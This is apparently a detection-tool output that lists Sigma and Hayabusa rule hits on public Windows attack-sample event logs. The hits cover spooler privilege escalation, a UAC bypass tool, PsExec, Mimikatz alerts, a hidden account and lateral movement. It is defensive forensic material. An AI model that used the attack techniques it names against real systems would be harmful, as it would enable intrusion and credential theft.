Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:45:14.007 +00:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:45:24.216 +00:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/image_load_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 13:23:30.614 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 13:23:32.141 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 17:38:11.138 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.138 +00:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.147 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.154 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.175 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 20:15:22.956 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 20:15:23.662 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 16:17:33.019 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 16:17:34.712 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 12:31:21.179 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 12:31:22.012 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 16:29:22.597 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 13:15:33.442 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.545 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:05.471 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-09 16:52:34.562 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.562 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.622 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.622 +00:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.478 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.478 +00:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.933 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.934 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:44.864 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:44.864 +00:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:45.141 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 22:45:33.090 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-09 22:45:34.204 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 11:18:52.190 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:52.191 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:52.447 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:54.600 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:54.856 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 12:28:01.299 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.299 +00:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.566 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.651 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.651 +00:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:43.010 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:44.317 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-17 10:38:33.951 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2020-12-18 17:56:07.017 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx +2021-01-26 13:21:13.237 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.558 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.560 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.561 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.683 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.690 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.690 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.972 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.975 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: 